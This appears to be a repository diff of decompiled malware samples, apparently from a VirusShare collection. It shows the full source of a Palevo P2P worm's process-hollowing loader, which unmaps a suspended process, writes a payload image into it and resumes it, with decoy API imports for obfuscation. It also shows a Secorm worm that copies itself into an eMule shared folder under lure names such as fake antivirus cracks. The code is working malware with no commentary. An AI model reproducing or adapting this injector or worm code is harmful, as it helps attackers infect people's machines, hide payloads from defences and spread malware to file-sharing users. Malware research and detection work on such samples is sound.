Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "66666", "P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80.csproj", "{9F4D5823-B0B6-4011-9309-6008EBD4A806}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{9F4D5823-B0B6-4011-9309-6008EBD4A806}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{9F4D5823-B0B6-4011-9309-6008EBD4A806}.Debug|Any CPU.Build.0 = Debug|Any CPU
{9F4D5823-B0B6-4011-9309-6008EBD4A806}.Release|Any CPU.ActiveCfg = Release|Any CPU
{9F4D5823-B0B6-4011-9309-6008EBD4A806}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/buffy.cs
+632
View File
@@ -0,0 +1,632 @@
// Decompiled with JetBrains decompiler
// Type: buffy
// Assembly: 66666, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2453255D-06D9-4B55-8A59-D5B108E7DFD5
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
public class buffy
{
public const long ASDFASFASF = 2778;
public const long FASFASFASF = 60116;
public const long AFSFASFASCFC = 218;
public const long ASDASCASDASD = 218;
public const long BVCXBXCBXCB = 218;
public const long BXCBXCBXCB = 253;
public const long FSDR3FSF = 218;
public const long KKKKKKKKKDDDDDDD = 17247;
public const uint FSSSSSSSSSSSSSSSSSS = 218;
public static void mickey(byte[] DAS4DA3, string VVVVVVCAE)
{
object Instance1 = (object) new buffy.Context();
object obj1 = (object) new buffy.Process_Information();
object obj2 = (object) new buffy.Startup_Information();
object obj3 = (object) new buffy.Security_Flags();
object obj4 = (object) new buffy.Security_Flags();
object Instance2 = (object) GCHandle.Alloc((object) DAS4DA3, GCHandleType.Pinned);
int integer1 = Conversions.ToInteger(NewLateBinding.LateGet(NewLateBinding.LateGet(Instance2, (Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (Type) null, "ToInt32", new object[0], (string[]) null, (Type[]) null, (bool[]) null));
buffy.DOS_Header dosHeader1 = new buffy.DOS_Header();
Type Type = typeof (Marshal);
object[] objArray1 = new object[2];
object[] objArray2 = objArray1;
object Instance3 = Instance2;
object objectValue = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(Instance3, (Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (Type[]) null, (bool[]) null));
objArray2[0] = objectValue;
objArray1[1] = (object) dosHeader1.GetType();
object[] objArray3 = objArray1;
object[] Arguments = objArray3;
bool[] flagArray = new bool[2]{ true, false };
bool[] CopyBack = flagArray;
object obj5 = NewLateBinding.LateGet((object) null, Type, "PtrToStructure", Arguments, (string[]) null, (Type[]) null, CopyBack);
if (flagArray[0])
NewLateBinding.LateSetComplex(Instance3, (Type) null, "AddrOfPinnedObject", new object[1]
{
RuntimeHelpers.GetObjectValue(objArray3[0])
}, (string[]) null, (Type[]) null, true, false);
buffy.DOS_Header dosHeader2;
buffy.DOS_Header dosHeader3 = obj5 != null ? (buffy.DOS_Header) obj5 : dosHeader2;
NewLateBinding.LateCall(Instance2, (Type) null, "Free", new object[0], (string[]) null, (Type[]) null, (bool[]) null, true);
buffy.GN04L0ER8I gn04L0Er8I1 = buffy.TXXY5U8D2U<buffy.GN04L0ER8I>("kernel32", "CreateProcessA");
buffy.R84OY4NT36 r84Oy4Nt36_1 = buffy.TXXY5U8D2U<buffy.R84OY4NT36>("kernel32", "GetThreadContext");
buffy.Q7QRRP639W q7QrrP639W1 = buffy.TXXY5U8D2U<buffy.Q7QRRP639W>("kernel32", "ReadProcessMemory");
buffy.ZGOQ8VM05M zgoQ8Vm05M1 = buffy.TXXY5U8D2U<buffy.ZGOQ8VM05M>("kernel32", "WriteProcessMemory");
buffy.EFVI2YI66B efvI2Yi66B1 = buffy.TXXY5U8D2U<buffy.EFVI2YI66B>("ntdll", "ZwUnmapViewOfSection");
buffy.W6CTR6GLCC w6CtR6Glcc1 = buffy.TXXY5U8D2U<buffy.W6CTR6GLCC>("kernel32", "VirtualAllocEx");
buffy.K7B3INYH01 k7B3InyH01_1 = buffy.TXXY5U8D2U<buffy.K7B3INYH01>("kernel32", "SetThreadContext");
buffy.WS2XVBNVO9 ws2XvbnvO9_1 = buffy.TXXY5U8D2U<buffy.WS2XVBNVO9>("kernel32", "ResumeThread");
buffy.GN04L0ER8I gn04L0Er8I2 = gn04L0Er8I1;
string DASDAS3E2_1 = VVVVVVCAE;
object obj6 = obj3;
buffy.Security_Flags securityFlags1;
buffy.Security_Flags securityFlags2 = obj6 != null ? (buffy.Security_Flags) obj6 : securityFlags1;
ref buffy.Security_Flags local1 = ref securityFlags2;
object obj7 = obj4;
buffy.Security_Flags securityFlags3 = obj7 != null ? (buffy.Security_Flags) obj7 : securityFlags1;
ref buffy.Security_Flags local2 = ref securityFlags3;
IntPtr num1;
IntPtr DSA43R3W1 = num1;
object obj8 = obj2;
buffy.Startup_Information startupInformation1;
buffy.Startup_Information startupInformation2 = obj8 != null ? (buffy.Startup_Information) obj8 : startupInformation1;
ref buffy.Startup_Information local3 = ref startupInformation2;
object obj9 = obj1;
buffy.Process_Information processInformation1;
buffy.Process_Information processInformation2 = obj9 != null ? (buffy.Process_Information) obj9 : processInformation1;
ref buffy.Process_Information local4 = ref processInformation2;
int num2 = gn04L0Er8I2((string) null, DASDAS3E2_1, ref local1, ref local2, false, 4U, DSA43R3W1, (string) null, ref local3, out local4) ? 1 : 0;
object obj10 = (object) processInformation2;
object Instance4 = (object) startupInformation2;
object obj11 = (object) securityFlags3;
object obj12 = (object) securityFlags2;
if (-((uint) num2 > 0U ? 1 : 0) == 0)
return;
buffy.NT_Headers ntHeaders1 = new buffy.NT_Headers();
IntPtr ptr = new IntPtr(checked (integer1 + dosHeader3.DASE3ASDAS));
object structure1 = Marshal.PtrToStructure(ptr, ntHeaders1.GetType());
buffy.NT_Headers ntHeaders2;
buffy.NT_Headers ntHeaders3 = structure1 != null ? (buffy.NT_Headers) structure1 : ntHeaders2;
NewLateBinding.LateSet(Instance4, (Type) null, "CSZE", new object[1]
{
(object) Strings.Len(RuntimeHelpers.GetObjectValue(Instance4))
}, (string[]) null, (Type[]) null);
NewLateBinding.LateSet(Instance1, (Type) null, "II69TOHMUR", new object[1]
{
(object) 65539
}, (string[]) null, (Type[]) null);
if (ntHeaders3.SSSSSSSSSSSQ != 17744U | dosHeader3.DASDASFASF != (ushort) 23117)
return;
buffy.GN04L0ER8I gn04L0Er8I3 = gn04L0Er8I1;
string DASDAS3E2_2 = VVVVVVCAE;
object obj13 = obj12;
securityFlags2 = obj13 != null ? (buffy.Security_Flags) obj13 : securityFlags1;
ref buffy.Security_Flags local5 = ref securityFlags2;
object obj14 = obj11;
securityFlags3 = obj14 != null ? (buffy.Security_Flags) obj14 : securityFlags1;
ref buffy.Security_Flags local6 = ref securityFlags3;
IntPtr DSA43R3W2 = num1;
object obj15 = Instance4;
startupInformation2 = obj15 != null ? (buffy.Startup_Information) obj15 : startupInformation1;
ref buffy.Startup_Information local7 = ref startupInformation2;
object obj16 = obj10;
processInformation2 = obj16 != null ? (buffy.Process_Information) obj16 : processInformation1;
ref buffy.Process_Information local8 = ref processInformation2;
int num3 = gn04L0Er8I3((string) null, DASDAS3E2_2, ref local5, ref local6, false, 4U, DSA43R3W2, (string) null, ref local7, out local8) ? 1 : 0;
object Instance5 = (object) processInformation2;
object obj17 = (object) startupInformation2;
object obj18 = (object) securityFlags3;
object obj19 = (object) securityFlags2;
if (-((uint) num3 > 0U ? 1 : 0) == 0)
return;
buffy.R84OY4NT36 r84Oy4Nt36_2 = r84Oy4Nt36_1;
object obj20 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASDASC = obj20 != null ? (IntPtr) obj20 : num1;
object obj21 = Instance1;
buffy.Context context1;
buffy.Context context2 = obj21 != null ? (buffy.Context) obj21 : context1;
ref buffy.Context local9 = ref context2;
int num4 = r84Oy4Nt36_2(DASDASC, ref local9) ? 1 : 0;
object Instance6 = (object) context2;
buffy.Q7QRRP639W q7QrrP639W2 = q7QrrP639W1;
object obj22 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr FASFDASDAS = obj22 != null ? (IntPtr) obj22 : num1;
int integer2 = Conversions.ToInteger(Operators.AddObject(NewLateBinding.LateGet(Instance6, (Type) null, "WDA", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (object) 8));
long num5;
int num6 = checked ((int) num5);
ref int local10 = ref num6;
int num7 = 0;
ref int local11 = ref num7;
int num8 = q7QrrP639W2(FASFDASDAS, integer2, ref local10, 4, ref local11);
long num9 = (long) num6;
buffy.EFVI2YI66B efvI2Yi66B2 = efvI2Yi66B1;
object obj23 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE3 = obj23 != null ? (IntPtr) obj23 : num1;
int AL8ZCRFWNU1 = checked ((int) num9);
long num10 = efvI2Yi66B2(DASE3, AL8ZCRFWNU1);
buffy.W6CTR6GLCC w6CtR6Glcc2 = w6CtR6Glcc1;
object obj24 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE43E = obj24 != null ? (IntPtr) obj24 : num1;
int dfazdasd = checked ((int) ntHeaders3.OOOU.DFAZDASD);
int dasrdasrasr = (int) ntHeaders3.OOOU.DASRDASRASR;
uint num11 = checked ((uint) (int) w6CtR6Glcc2(DASE43E, dfazdasd, (uint) dasrdasrasr, 12288U, 4U));
if (num11 == 0U)
return;
buffy.ZGOQ8VM05M zgoQ8Vm05M2 = zgoQ8Vm05M1;
object obj25 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE32_1 = obj25 != null ? (IntPtr) obj25 : num1;
int AL8ZCRFWNU2 = checked ((int) num11);
byte[] DSAE32_1 = DAS4DA3;
int wqdasdasd = checked ((int) ntHeaders3.OOOU.WQDASDASD);
uint num12;
int num13 = checked ((int) num12);
ref int local12 = ref num13;
int num14 = zgoQ8Vm05M2(DASE32_1, AL8ZCRFWNU2, DSAE32_1, wqdasdasd, out local12) ? 1 : 0;
uint num15 = checked ((uint) num13);
long num16 = (long) checked (dosHeader3.DASE3ASDAS + 248);
int num17 = checked ((int) ntHeaders3.DSEEEEE.DAAAAAAAA3 - 1);
int num18 = 0;
while (num18 <= num17)
{
ptr = new IntPtr(checked ((long) integer1 + num16 + (long) (num18 * 40)));
buffy.Section_Header sectionHeader1;
object structure2 = Marshal.PtrToStructure(ptr, sectionHeader1.GetType());
buffy.Section_Header sectionHeader2;
sectionHeader1 = structure2 != null ? (buffy.Section_Header) structure2 : sectionHeader2;
byte[] numArray = new byte[checked ((int) sectionHeader1.DA22S3 + 1)];
int num19 = checked ((int) ((long) sectionHeader1.DA22S3 - 1L));
int index = 0;
while (index <= num19)
{
numArray[index] = DAS4DA3[checked ((int) ((long) sectionHeader1.PoinEEter + (long) index))];
checked { ++index; }
}
buffy.ZGOQ8VM05M zgoQ8Vm05M3 = zgoQ8Vm05M1;
object obj26 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE32_2 = obj26 != null ? (IntPtr) obj26 : num1;
int AL8ZCRFWNU3 = checked ((int) (num11 + sectionHeader1.AL8ZCRFWNU));
byte[] DSAE32_2 = numArray;
int da22S3 = checked ((int) sectionHeader1.DA22S3);
int num20 = checked ((int) num15);
ref int local13 = ref num20;
int num21 = zgoQ8Vm05M3(DASE32_2, AL8ZCRFWNU3, DSAE32_2, da22S3, out local13) ? 1 : 0;
num15 = checked ((uint) num20);
checked { ++num18; }
}
object bytes = (object) BitConverter.GetBytes(num11);
buffy.ZGOQ8VM05M zgoQ8Vm05M4 = zgoQ8Vm05M1;
object obj27 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE32_3 = obj27 != null ? (IntPtr) obj27 : num1;
int integer3 = Conversions.ToInteger(Operators.AddObject(NewLateBinding.LateGet(Instance6, (Type) null, "WDA", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (object) 8));
byte[] DSAE32_3 = (byte[]) bytes;
int num22 = checked ((int) num15);
ref int local14 = ref num22;
int num23 = zgoQ8Vm05M4(DASE32_3, integer3, DSAE32_3, 4, out local14) ? 1 : 0;
num12 = checked ((uint) num22);
NewLateBinding.LateSet(Instance6, (Type) null, "AS4", new object[1]
{
(object) checked (num11 + ntHeaders3.OOOU.DDDDDDDDAAA)
}, (string[]) null, (Type[]) null);
buffy.K7B3INYH01 k7B3InyH01_2 = k7B3InyH01_1;
object obj28 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr ASDASCASDASD = obj28 != null ? (IntPtr) obj28 : num1;
object obj29 = Instance6;
context2 = obj29 != null ? (buffy.Context) obj29 : context1;
ref buffy.Context local15 = ref context2;
int num24 = k7B3InyH01_2(ASDASCASDASD, ref local15) ? 1 : 0;
object obj30 = (object) context2;
buffy.WS2XVBNVO9 ws2XvbnvO9_2 = ws2XvbnvO9_1;
object obj31 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASEAS = obj31 != null ? (IntPtr) obj31 : num1;
int num25 = (int) ws2XvbnvO9_2(DASEAS);
}
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string tr6);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr gdr54, [MarshalAs(UnmanagedType.VBByRefStr)] ref string gfsd54);
[DllImport("rpcns4.dll", EntryPoint = "RpcNsProfileEltAddA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long RpcNsProfileEltAdd(
long ProfileNameSyntax,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string ProfileName,
ref IntPtr IfId,
long MemberNameSyntax,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string MemberName,
long Priority,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string Annotation);
[DllImport("wldap32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ldap_close_extended_op(ref IntPtr ld, long MessageNumber);
[DllImport("tapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long lineSetAppSpecific(long hCall, long dwAppSpecific);
[DllImport("rtm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long MgmGetNextMfeStats(
ref IntPtr pimmStart,
ref long pdwBufferSize,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string pbBuffer,
ref long pdwNumEntries);
[DllImport("mprapi.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long MprAdminDeviceEnum(
ref IntPtr hMprServer,
long dwLevel,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lplpbBuffer,
ref long lpdwTotalEntries);
[DllImport("MSI.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long MsiDatabaseImport(
ref IntPtr hDatabase,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string szFolderPath,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string szFileName);
[DllImport("rpcrt4.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NdrMesSimpleTypeAlignSize(long handle_t);
[DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NetMessageNameDel([MarshalAs(UnmanagedType.VBByRefStr)] ref string servername, [MarshalAs(UnmanagedType.VBByRefStr)] ref string msgname);
[DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NetReplExportDirSetInfo(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string servername,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string dirname,
long level,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string buf,
ref long parm_err);
[DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NetUseGetInfo(
ref IntPtr UncServerName,
ref IntPtr UseName,
long level,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string bufptr);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long QueueUserWorkItem(long lFunction, ref long Context, long Flags);
[DllImport("kernel32.dll", EntryPoint = "ReadConsoleInputA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadConsoleInput(
long hConsoleInput,
ref IntPtr lpBuffer,
long nLength,
ref long lpNumberOfEventsRead);
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ShowWindowAsync(long hWnd, long nCmdShow);
[DllImport("mgmtapi.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SnmpMgrCtl(
ref IntPtr session,
long dwCtlCode,
ref long lpvInBuffer,
long cbInBuffer,
ref long lpvOUTBuffer,
long cbOUTBuffer,
ref long lpcbBytesReturned);
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long AddAuditAccessAceEx(
IntPtr pAcl,
long dwAceRevision,
long AceFlags,
long dwAccessMask,
ref IntPtr pSid,
long bAuditSuccess,
long bAuditFailure);
[DllImport("ODBCCP32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SQLInstallerError(
int iError,
ref long pfErrorCode,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszErrorMsg,
int cbErrorMsgMax,
ref int pcbErrorMsg);
[DllImport("msorcl32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SQLSetCursorName(long hstmt, [MarshalAs(UnmanagedType.VBByRefStr)] ref string szCursor, int cbCursor);
[DllImport("rasapi32.dll", EntryPoint = "RasSetCredentialsA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long RasSetCredentials(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpcstr,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpcstr,
ref IntPtr TLPRASCREDENTIALSA,
long @bool);
[DllImport("kernel32.dll", EntryPoint = "ReadConsoleA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadConsole(
long hConsoleInput,
ref long lpBuffer,
long nNumberOfCharsToRead,
ref long lpNumberOfCharsRead,
ref long lpReserved);
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadEncryptedFileRaw(
ref IntPtr pfExportCallback,
ref long pvCallbackContext,
ref long pvContext);
[DllImport("winspool.drv", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadPrinter(
long hPrinter,
ref long pBuf,
long cdBuf,
ref long pNoBytesRead);
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long RegisterHotKey(long hwnd, long id, long fsModifiers, long vk);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReleaseSemaphore(
long hSemaphore,
long lReleaseCount,
ref long lpPreviousCount);
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr GetSiteNameFromSid(ref long pSid, [MarshalAs(UnmanagedType.VBByRefStr)] ref string pwsSite);
[DllImport("kernel32.dll", EntryPoint = "GetStringTypeExA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long GetStringTypeEx(
long Locale,
long dwInfoType,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpSrcStr,
long cchSrc,
ref int lpCharType);
[DllImport("kernel32.dll", EntryPoint = "GetVolumePathNameA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long GetVolumePathName(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszFileName,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszVolumePathName,
long cchBufferLength);
[DllImport("user32.dll", EntryPoint = "SetWindowLongA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SetWindowLong(long hwnd, long nIndex, long dwNewLong);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long TlsSetValue(long dwTlsIndex, ref long lpTlsValue);
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr ToAscii(
long uVirtKey,
long uScanCode,
ref byte lpbKeyState,
ref long lpwTransKey,
long fuState);
private static T TXXY5U8D2U<T>(string ASFASE3, string FASGAS543W) => (T) Marshal.GetDelegateForFunctionPointer(buffy.GetProcAddress(buffy.LoadLibraryA(ref ASFASE3), ref FASGAS543W), typeof (T));
public struct Context
{
public uint II69TOHMUR;
public uint d2;
public uint das;
public uint d9;
public uint ad;
public uint dsa;
public uint ds;
public buffy.Save Save;
public uint dh;
public uint sad;
public uint da;
public uint MD;
public uint RD;
public uint mSI;
public uint WDA;
public uint AD3;
public uint D21;
public uint AS4;
public uint K32;
public uint F2W;
public uint HHJ;
public uint ADF5;
public uint GSSA;
public uint DSAAA;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] er6rgdr65;
}
public struct Save
{
public uint KD7JX2MXT;
public uint JCNS3ZPSXO;
public uint DAS3;
public uint DAS23;
public uint ADSA;
public uint DAF35;
public uint FA32D;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] FSDRF43;
public uint FA32QA;
}
public struct Misc
{
public uint SDUHRL;
public uint GSIJ;
}
public struct Section_Header
{
public byte FSDPOU4PO3;
public buffy.Misc Mi2sc;
public uint AL8ZCRFWNU;
public uint DA22S3;
public uint PoinEEter;
public uint E2Q4RS;
public uint FS523QF;
public uint FSB43FSD4;
public uint QBFAS4E;
public uint AS32QFZS;
}
public struct Process_Information
{
public IntPtr DAS4QQW;
public IntPtr RFSER;
public int TGJWE;
public int SDFFFFFFFFFF;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct Startup_Information
{
public int CSZE;
public string FSDR4G;
public string AAAAAAAAAA;
public string AADDDDDDD;
public int ADA;
public int C;
public int AEDS;
public int DASDDDD;
public int XASE4;
public int DAS3EDFZ;
public int DVA3ES;
public int CCCCQ;
public short FDSRS;
public short VYE5X;
public int KHJKIHJK;
public int KHJKHJK;
public int KHJKHJ;
public int KHJKJHK;
}
public struct Security_Flags
{
public int GFSETWE;
public IntPtr EWEWWW;
public int DASDAS;
}
public struct DOS_Header
{
public ushort DASDASFASF;
public ushort QWEQWE;
public ushort EQWEQWEQWE;
public ushort HFGHFGHFGH;
public ushort HFGHFGHFG;
public ushort DASD444444;
public ushort DASFASE33;
public ushort DASKGHJ;
public ushort DASVZDF;
public ushort VXCVXC;
public ushort VXCVXCV;
public ushort EWECS;
public ushort EWADC;
public ushort UADA3;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public ushort[] ReservWWWWWWWWWWWWWWWedA;
public ushort DAS4E;
public ushort UJJ;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
public ushort[] DDDDDDDDD;
public int DASE3ASDAS;
}
public struct NT_Headers
{
public uint SSSSSSSSSSSQ;
public buffy.File_Header DSEEEEE;
public buffy.Optional_Headers OOOU;
}
public struct File_Header
{
public ushort ITTTTTTTT;
public ushort DAAAAAAAA3;
public uint HRFTYTYTR;
public uint GJGFSFS;
public uint FSVGY;
public ushort FSFV;
public ushort A34FFC;
}
public struct Optional_Headers
{
public ushort WWWWWWWWW;
public byte MaAAAAAAAAAAAjor;
public byte MiSSSSSSSSSSSnor;
public uint SSSSSSSSSSSSS;
public uint FFFFFFFFFFF;
public uint XXXXXXXX;
public uint DDDDDDDDAAA;
public uint FSSSSSSS;
public uint RSFS43;
public uint DFAZDASD;
public uint SectionA;
public uint FileA;
public ushort GDFTDFFFF;
public ushort HGDFHD564;
public ushort GD5ERGD;
public ushort FSD5YHD;
public ushort ASDASG;
public ushort AS4ASAS;
public uint CCC;
public uint DASRDASRASR;
public uint WQDASDASD;
public uint Assssssss;
public ushort fsd4s;
public ushort fjio;
public uint dasrlajstpoi;
public uint dasdraskyjhuasp;
public uint SHRedas4wa9uqserve;
public uint fsdtsysyt;
public uint eawdasdas3;
public uint Cocccunt;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public buffy.Data_Directory[] GSDGSDT4;
}
public struct Data_Directory
{
public uint ewq34q234;
public uint das34aw33;
}
public delegate bool GN04L0ER8I(
string ASFASE3,
string DASDAS3E2,
ref buffy.Security_Flags DASCASE,
ref buffy.Security_Flags CASE222,
bool DAS432E,
uint AEDFKJK32,
IntPtr DSA43R3W,
string ase32ew,
[In] ref buffy.Startup_Information das43fsa,
out buffy.Process_Information das3);
public delegate bool ZGOQ8VM05M(
IntPtr DASE32,
int AL8ZCRFWNU,
byte[] DSAE32,
int DASEADAS,
out int ASD43FA);
public delegate int Q7QRRP639W(
IntPtr FASFDASDAS,
int AL8ZCRFWNU,
ref int CAS32,
int ASDASC,
ref int CASTWE);
public delegate IntPtr W6CTR6GLCC(
IntPtr DASE43E,
int AL8ZCRFWNU,
uint DASCAS3,
uint DAS3,
uint DAS32);
public delegate long EFVI2YI66B(IntPtr DASE3, int AL8ZCRFWNU);
public delegate uint WS2XVBNVO9(IntPtr DASEAS);
public delegate bool R84OY4NT36(IntPtr DASDASC, ref buffy.Context DSACSA43);
public delegate bool K7B3INYH01(IntPtr ASDASCASDASD, ref buffy.Context ASCA434);
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/pizde.cs
+639
View File
File diff suppressed because one or more lines are too long
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Secorm-66106dc8b8fbe05f679ce87d7a4bae2d1661e4c1dc62f380accd3cbeaaed1ad6/AssemblyInfo.cs
+13
View File
@@ -0,0 +1,13 @@
using System.Reflection;
[assembly: AssemblyCopyright("")]
[assembly: AssemblyKeyFile("")]
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyKeyName("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyVersion("1.0.1397.42263")]
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Secorm-66106dc8b8fbe05f679ce87d7a4bae2d1661e4c1dc62f380accd3cbeaaed1ad6/Form1.cs
+42
View File
@@ -0,0 +1,42 @@
// Decompiled with JetBrains decompiler
// Type: WindowsApplication1.Form1
// Assembly: WindowsApplication1, Version=1.0.1397.42263, Culture=neutral, PublicKeyToken=null
// MVID: AFD50EA1-B36A-4E16-9DBC-77E7D8FDC9A1
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Secorm-66106dc8b8fbe05f679ce87d7a4bae2d1661e4c1dc62f380accd3cbeaaed1ad6.exe
using System;
using System.IO;
using System.Windows.Forms;
namespace WindowsApplication1
{
public class Form1 : Form
{
[STAThread]
private static void Main()
{
string destFileName1 = "C:\\Program Files\\eMule\\Incoming\\Teen Sex.exe";
if (Application.ExecutablePath != destFileName1)
File.Copy(Application.ExecutablePath, destFileName1, true);
string destFileName2 = "C:\\Program Files\\eMule\\Incoming\\AVP Crack.exe";
if (Application.ExecutablePath != destFileName2)
File.Copy(Application.ExecutablePath, destFileName2, true);
string destFileName3 = "C:\\Program Files\\eMule\\Incoming\\Panda Antivirus Crack.exe";
if (Application.ExecutablePath != destFileName3)
File.Copy(Application.ExecutablePath, destFileName3, true);
string destFileName4 = "C:\\Program Files\\eMule\\Incoming\\Hotmail Hack.exe";
if (Application.ExecutablePath != destFileName4)
File.Copy(Application.ExecutablePath, destFileName4, true);
string destFileName5 = "C:\\Program Files\\eMule\\Incoming\\Yahoo Hack.exe";
if (Application.ExecutablePath != destFileName5)
File.Copy(Application.ExecutablePath, destFileName5, true);
string destFileName6 = "C:\\Program Files\\eMule\\Incoming\\Commandos 3 Crack.exe";
if (Application.ExecutablePath != destFileName6)
File.Copy(Application.ExecutablePath, destFileName6, true);
string destFileName7 = "C:\\Program Files\\eMule\\Incoming\\Zone Alarm Pro Crack.exe";
if (!(Application.ExecutablePath != destFileName7))
return;
File.Copy(Application.ExecutablePath, destFileName7, true);
}
}
}
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Secorm-66106dc8b8fbe05f679ce87d7a4bae2d1661e4c1dc62f380accd3cbeaaed1ad6/Form1.resx
+123
View File
